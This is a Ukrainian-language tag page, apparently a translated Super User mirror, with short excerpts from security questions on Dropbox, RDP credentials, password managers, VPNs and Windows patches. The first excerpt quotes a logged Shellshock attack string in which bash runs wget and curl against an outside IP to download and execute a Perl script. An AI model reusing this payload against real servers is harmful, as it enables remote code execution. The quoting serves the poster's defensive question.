Запитання з тегом «security»

Захист комп'ютерних систем та інформації від загроз, таких як крадіжки чи знищення даних.

3
Це напад чи щось турбує? Shellshock?
Побачив це access.logна моєму тестовому сервері: > 173.45.100.18 - - [26/Sep/2014:07:09:53 +0200] "GET /cgi-bin/hi HTTP/1.0" 404 490 "-" "() { :;}; /bin/bash -c \"cd /tmp;wget > http://213.5.67.223/ji;curl -O /tmp/ji http://213.5.67.223/jurat ; > perl /tmp/ji;rm -rf /tmp/ji;rm -rf /tmp/ji*\"" Жодна адреса не пов’язана зі мною, або наш IP-діапазон (або що-небудь інше …

3
Підрив прапора на виконання в системах Linux. Чому це можливо?
Читаючи це , я знайшов наступний подвиг: % cp /usr/bin/id ~ % chmod -x ~/id % ls -al ~/id -rw-r--r-- 1 edd edd 22020 2012-08-01 15:06 /home/edd/id % ~/id zsh: permission denied: /home/edd/id % /lib/ld-linux.so.2 ~/id uid=1001(edd) gid=1001(edd) groups=1001(edd),1002(wheel) Цей фрагмент показує, що ми можемо тривіально виконувати дозволи на виконання …

10
Чи безпечно зберігати напівчутливу інформацію в Dropbox?
Я б не довіряв Dropbox своїм банківським реквізитам і тому подібному (тому що дуже багато людей шукає таку інформацію), але чи безпечно зберігати речі, які можуть бути цінними для невеликої кількості людей? Наприклад, делікатна комерційна інформація, проекти наукових праць, аркуші відповідей на оцінювання університету, я репетитор тощо. Чи є щось …


3
Чи зберігаються збережені облікові дані віддаленого робочого столу на локальній машині?
Чи збережені облікові дані віддаленого робочого столу надійно (вільно кажучи) на локальній машині? Вони принаймні ніде не зберігаються як чіткий текст, чи не так? Редагувати: я розумію властиві ризики збереження паролів. Безумовно, хоча існує спектр ефективності, наприклад, збереження пароля через щось на зразок CryptProtectData( що Google Chrome використовує на Win32 …

2
Де зберігається мій сертифікат сервера RDP?
Враховуючи останні випуски атак "Людина в середині", я фактично звернув увагу на попередження, яке отримую під час підключення до сервера: Вибравши сертифікат перегляду , я збирався перевірити SHA1 Ескіз : Кому видано : корсар емітованих : корсар Дійсно з : 9/5/2013 до 3/7/2014 Відбитків (SHA1):‎e9 c5 d7 17 95 95 …


16
Менеджер паролів для декількох комп'ютерів? [зачинено]
Зачинено. Це питання поза темою . Наразі відповіді не приймаються. Хочете вдосконалити це питання? Оновіть питання, щоб це було темою для Super User. Закрито 4 роки тому . Чи є менеджер паролів, який я можу використовувати на декількох комп’ютерах, щоб запам'ятати всі паролі, які я використовую на відвідуваних сайтах?

3
Я параноїк, чи корпоративний брандмауер цензуру цілих країн? [зачинено]
Закрито . Це питання має бути більш зосередженим . Наразі відповіді не приймаються. Хочете вдосконалити це питання? Оновіть питання, щоб воно зосередило увагу на одній проблемі, лише відредагувавши цю публікацію . Закрито 2 роки тому . Останнім часом, за останній рік чи більше, я помітив, що здається, що все важче …

4
Як перевірити, чи встановлено певне оновлення безпеки Windows?
З огляду на те, що експлуатація викупового програмного забезпечення WannaCry відбувається, я хотів перевірити, чи є на моєму комп’ютері специфічне оновлення безпеки, яке повинно зупинити вразливість - мабуть, MS17-010, припускаючи, що я розумію вразливість і це справді правильний патч. Як можна перевірити цю деталь? Майкрософт намагається дати детальну інформацію, але …

6
Захист паролем папки
Які доступні варіанти захисту паролем папки? Я говорю про те, щоб вимагати пароля для фактичного доступу до папки, а не лише прав доступу користувачів. Чи надійно надійне та стабільне програмне забезпечення сторонніх виробників? Які рекомендації?

5
Чи безпечний трафік https через незашифровану бездротову мережу?
Це те, про що я довго думав. Якщо я, скажімо, використовую Gmail через https, чи можу я хтось читати мої розмови та електронні листи, якщо я використовую незахищену бездротову мережу? Я припускаю, що дані будуть безпечними, оскільки вони використовують зашифроване з'єднання. Чи є ще щось, щоб розглянути?

3
Яка різниця між проксі-сервером і VPN?
Є кілька постачальників послуг, які дозволяють користувачеві обходити міжмережеві стіни або анонімізувати їх доступ до Інтернету. Деякі з них використовують проксі, деякі використовують VPN. Більшість людей кажуть, що VPN зазвичай працюють краще, ніж проксі. Вони, як правило, дорожчі. Наприклад, проксі надасть міжнародному користувачеві доступ до Pandora.com, але не Hulu.com. VPN …
21 security  vpn  proxy 


4
Які способи запобігти написанню чи читанню файлів із символом «Праворуч на лівий переосмислення Unicode» у своєму імені (метод підробки зловмисного програмного забезпечення)?
Які способи уникнути або заборонити файлам із символом RLO (праворуч на лівий переосмислення) Unicode у своєму імені (метод зловмисного програмного забезпечення для підробки імені файлів) не записуватися чи читатись на комп'ютері Windows? Більше інформації про символ унікодування RLO тут: Символ Unicode "ПЕРЕГЛЯД ПРАВО-ЛІВО" (U + 202E) Двонаправлений текст Інформація про …

Використовуючи наш веб-сайт, ви визнаєте, що прочитали та зрозуміли наші Політику щодо файлів cookie та Політику конфіденційності.
Licensed under cc by-sa 3.0 with attribution required.